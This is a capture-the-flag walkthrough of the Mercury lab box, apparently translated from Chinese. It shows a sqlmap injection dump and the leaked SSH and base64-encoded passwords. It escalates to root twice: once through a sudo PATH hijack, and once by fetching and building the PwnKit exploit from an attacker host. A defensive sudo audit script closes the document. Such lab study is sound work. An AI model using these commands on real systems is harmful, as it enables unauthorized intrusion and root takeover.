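Words of wisdom
Do not contend with hypocrites for fame, with petty men for profit, with the stubborn over reason, with brutes over courage, or with pedants over talent. Do not do favors for fools.

I. Information gathering
Host discovery
Port scan
Service and version detection
Port 8080 is running an HTTP service.
Directory scan
There is nothing under robots.txt.

II. Vulnerability discovery
Entering an arbitrary invalid parameter triggers an error page that discloses an important directory, mercuryfacts/.
This looks like SQL injection, and running sqlmap confirms it. The steps are not shown here: there is no filtering, so a single run does it.

python sqlmap.py -u http://192.168.1.41:8080/mercuryfacts/1 --batch -D mercury -T users -C username,password --dump

III. SSH connection
webmaster:mercuryisthesizeof0.056Earths

V. Privilege escalation
1. Method one
webmaster@mercury:/home$ ll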
total 20
drwxr-xr-x 5 root root 4096 Aug 28 2020 ./
drwxr-xr-x 19 root root 4096 Sep 1 2020 ../
drwx------ 3 linuxmaster linuxmaster 4096 Jan 10 12:46 linuxmaster/
drwx------ 3 mercury mercury 4096 Sep 1 2020 mercury/
drwx------ 4 webmaster webmaster 4096 Sep 2 2020 webmaster/
webmaster@mercury:/home$ cd /web
-bash: cd: /web: No such file or directory
webmaster@mercury:/home$ cd webmaster/
webmaster@mercury:~$ ll
total 36
drwx------ 4 webmaster webmaster 4096 Sep 2 2020 ./
drwxr-xr-x 5 root root 4096 Aug 28 2020 ../
lrwxrwxrwx 1 webmaster webmaster 9 Sep 1 2020 .bash_history -> /dev/null
-rw-r--r-- 1 webmaster webmaster 220 Aug 27 2020 .bash_logout
-rw-r--r-- 1 webmaster webmaster 3771 Aug 27 2020 .bashrc
drwx------ 2 webmaster webmaster 4096 Aug 27 2020 .cache/
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 mercury_proj/
-rw-r--r-- 1 webmaster webmaster 807 Aug 27 2020 .profile
-rw-rw-r-- 1 webmaster webmaster 75 Sep 1 2020 .selected_editor
-rw------- 1 webmaster webmaster 45 Sep 1 2020 user_flag.txt
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ll
total 28
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 ./
drwx------ 4 webmaster webmaster 4096 Sep 2 2020 ../
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py*
drwxrwxr-x 6 webmaster webmaster 4096 Sep 1 2020 mercury_facts/
drwxrwxr-x 4 webmaster webmaster 4096 Aug 28 2020 mercury_index/
drwxrwxr-x 3 webmaster webmaster 4096 Aug 28 2020 mercury_proj/
-rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==

notes.txt contains the linuxmaster password, which has to be base64-decoded.

webmaster@mercury:~/mercury_proj$ echo bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== | base64 -d
mercurymeandiameteris4880km

su to linuxmaster.

linuxmaster@mercury:/tmp$ sudo -l
[sudo] password for linuxmaster:
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:/tmp$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:/tmp$ echo /bin/bash > shell    # write /bin/bash into shell
linuxmaster@mercury:/tmp$ export PATH=.:$PATH    # put the current directory on PATH
linuxmaster@mercury:/tmp$ chmod 777 shell    # make it executable
linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh

When you run a command with sudo, it normally builds a new, relatively clean environment to prevent potential security problems. --preserve-env lets you name the environment variables to keep in that new environment; PATH is a common one.

root@mercury:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@mercury:/tmp# cd /root
root@mercury:~# cat root_flag.txt
Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]

2. Method two: kernel privilege escalation
Download the CVE-2021-4034 exploit on Kali and use it to escalate privileges.

wget https://github.com/berdav/CVE-2021-4034.git
┌──(root㉿kali)-[~/kali/CVE]
└─# ll
总计 64
drwxr-xr-x 5 root root 4096 1月 4日 02:14 CVE-2021-4034
-rw-r--r-- 1 root root 57922 1月 4日 04:25 CVE-2021-4034.tar.gz
┌──(root㉿kali)-[~/kali/CVE]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

1. mkdir 123
2. cd 123
3. wget http://192.168.1.48:8888/CVE-2021-4034.tar.gz
4. tar -xvf CVE-2021-4034.tar.gz  # be sure to compress it on Kali first and then download it on the target; otherwise there will be problems
5. cd CVE-2021-4034/
6. make
7. ./cve-2021-4034

There is no need to read what follows; just follow the steps above.

linuxmaster@mercury:/tmp/CVE-2021-4034$ mkdir 123
linuxmaster@mercury:/tmp/CVE-2021-4034$ cd 123/
linuxmaster@mercury:/tmp/CVE-2021-4034/123$ wget http://192.168.1.48:8888/CVE-2021-4034.tar.gz
--2024-01-10 14:11:40-- http://192.168.1.48:8888/CVE-2021-4034.tar.gz
Connecting to 192.168.1.48:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 57922 (57K) [application/gzip]
Saving to: ‘CVE-2021-4034.tar.gz’
CVE-2021-4034.tar.gz 100%[===================>] 56.56K --.-KB/s in 0.001s
2024-01-10 14:11:40 (92.1 MB/s) - ‘CVE-2021-4034.tar.gz’ saved [57922/57922]
linuxmaster@mercury:/tmp/CVE-2021-4034/123$ tar -xvf CVE-2021-4034.tar.gz
linuxmaster@mercury:/tmp/CVE-2021-4034/123$ ll
total 72
drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ./
drwxr-xr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../
drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 4 07:14 CVE-2021-4034/
-rw-rw-r-- 1 linuxmaster linuxmaster 57922 Jan 4 09:25 CVE-2021-4034.tar.gz
linuxmaster@mercury:/tmp/CVE-2021-4034/123$ cd CVE-2021-4034/
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll
total 68
drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 4 07:14 ./
drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../
-rw-r--r-- 1 linuxmaster linuxmaster 292 Jan 4 07:05 cve-2021-4034.c
-rwxr-xr-x 1 linuxmaster linuxmaster 305 Jan 4 07:05 cve-2021-4034.sh*
drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:05 dry-run/
-rw-r--r-- 1 linuxmaster linuxmaster 33 Jan 4 07:06 gconv-modules
drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:06 GCONV_PATH=./
drwxr-xr-x 8 linuxmaster linuxmaster 4096 Jan 4 07:05 .git/
-rw-r--r-- 1 linuxmaster linuxmaster 114 Jan 4 07:05 .gitignore
-rw-r--r-- 1 linuxmaster linuxmaster 1071 Jan 4 07:05 LICENSE
-rw-r--r-- 1 linuxmaster linuxmaster 469 Jan 4 07:05 Makefile
-rw-r--r-- 1 linuxmaster linuxmaster 339 Jan 4 07:05 pwnkit.c
-rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan 4 07:06 pwnkit.so*
-rw-r--r-- 1 linuxmaster linuxmaster 3419 Jan 4 07:05 README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ make
cc -Wall cve-2021-4034.c -o cve-2021-4034
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll
total 88
drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 10 14:12 ./
drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../
-rwxrwxr-x 1 linuxmaster linuxmaster 16752 Jan 10 14:12 cve-2021-4034*
-rw-r--r-- 1 linuxmaster linuxmaster 292 Jan 4 07:05 cve-2021-4034.c
-rwxr-xr-x 1 linuxmaster linuxmaster 305 Jan 4 07:05 cve-2021-4034.sh*
drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:05 dry-run/
-rw-r--r-- 1 linuxmaster linuxmaster 33 Jan 4 07:06 gconv-modules
drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:06 GCONV_PATH=./
drwxr-xr-x 8 linuxmaster linuxmaster 4096 Jan 4 07:05 .git/
-rw-r--r-- 1 linuxmaster linuxmaster 114 Jan 4 07:05 .gitignore
-rw-r--r-- 1 linuxmaster linuxmaster 1071 Jan 4 07:05 LICENSE
-rw-r--r-- 1 linuxmaster linuxmaster 469 Jan 4 07:05 Makefile
-rw-r--r-- 1 linuxmaster linuxmaster 339 Jan 4 07:05 pwnkit.c
-rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan 4 07:06 pwnkit.so*
-rw-r--r-- 1 linuxmaster linuxmaster 3419 Jan 4 07:05 README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ chmod +x cve-2021-4034
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ls
cve-2021-4034 cve-2021-4034.c cve-2021-4034.sh dry-run gconv-modules GCONV_PATH=. LICENSE Makefile pwnkit.c pwnkit.so README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ll
total 88
drwxr-xr-x 5 linuxmaster linuxmaster 4096 Jan 10 14:12 ./
drwxrwxr-x 3 linuxmaster linuxmaster 4096 Jan 10 14:11 ../
-rwxrwxr-x 1 linuxmaster linuxmaster 16752 Jan 10 14:12 cve-2021-4034*
-rw-r--r-- 1 linuxmaster linuxmaster 292 Jan 4 07:05 cve-2021-4034.c
-rwxr-xr-x 1 linuxmaster linuxmaster 305 Jan 4 07:05 cve-2021-4034.sh*
drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:05 dry-run/
-rw-r--r-- 1 linuxmaster linuxmaster 33 Jan 4 07:06 gconv-modules
drwxr-xr-x 2 linuxmaster linuxmaster 4096 Jan 4 07:06 GCONV_PATH=./
drwxr-xr-x 8 linuxmaster linuxmaster 4096 Jan 4 07:05 .git/
-rw-r--r-- 1 linuxmaster linuxmaster 114 Jan 4 07:05 .gitignore
-rw-r--r-- 1 linuxmaster linuxmaster 1071 Jan 4 07:05 LICENSE
-rw-r--r-- 1 linuxmaster linuxmaster 469 Jan 4 07:05 Makefile
-rw-r--r-- 1 linuxmaster linuxmaster 339 Jan 4 07:05 pwnkit.c
-rwxr-xr-x 1 linuxmaster linuxmaster 15560 Jan 4 07:06 pwnkit.so*
-rw-r--r-- 1 linuxmaster linuxmaster 3419 Jan 4 07:05 README.md
linuxmaster@mercury:/tmp/CVE-2021-4034/123/CVE-2021-4034$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),1002(linuxmaster),1003(viewsyslog)
# cd root
/bin/sh: 2: cd: can't cd to root
# cd /root
# ll
/bin/sh: 4: ll: not found
# ls
root_flag.txt
# at roo
# cat root_flag.txt
Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
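
Method one depends on two things visible in the session above: the sudoers entry carries the SETENV tag, which lets the caller pass PATH through sudo despite env_reset and secure_path, and check_syslog.sh calls tail by bare name. The audit sketch below is an added example, not part of the original write-up; the function names and the embedded sample text (copied from the output shown on this page) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag sudo rules that allow environment passing, and scripts
# that resolve commands through PATH. Sample inputs are constructed from the
# output shown in this write-up.

SUDO_L='User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh'

# The script as found on the box, and a hardened variant for comparison.
WEAK_SCRIPT='#!/bin/bash
tail -n 10 /var/log/syslog'
FIXED_SCRIPT='#!/bin/bash
/usr/bin/tail -n 10 /var/log/syslog'

# Read `sudo -l` text on stdin; print each command granted with SETENV.
setenv_commands() {
    # Strip everything up to and including the last TAG: on the line.
    awk '/SETENV:/ { sub(/^.*[A-Z_]+:[ \t]*/, ""); print }'
}

# Read a shell script on stdin; print commands it calls by bare name, i.e.
# names the shell looks up through PATH. Heuristic: first word of each line.
path_resolved_commands() {
    while read -r word _rest; do
        case "$word" in
            ''|'#'*|*/*|*=*) continue ;;  # blank, comment, explicit path, assignment
        esac
        # command -v echoes the bare name for builtins and keywords; any other
        # answer (a path, or nothing) means the lookup goes through PATH.
        [ "$(command -v "$word" 2>/dev/null)" = "$word" ] || printf '%s\n' "$word"
    done
}

printf 'SETENV grant: %s\n' "$(printf '%s\n' "$SUDO_L" | setenv_commands)"
printf 'PATH-resolved in script: %s\n' \
    "$(printf '%s\n' "$WEAK_SCRIPT" | path_resolved_commands)"
```

Either finding alone is enough to act on: remove SETENV from the sudoers entry, and call /usr/bin/tail by absolute path inside the script.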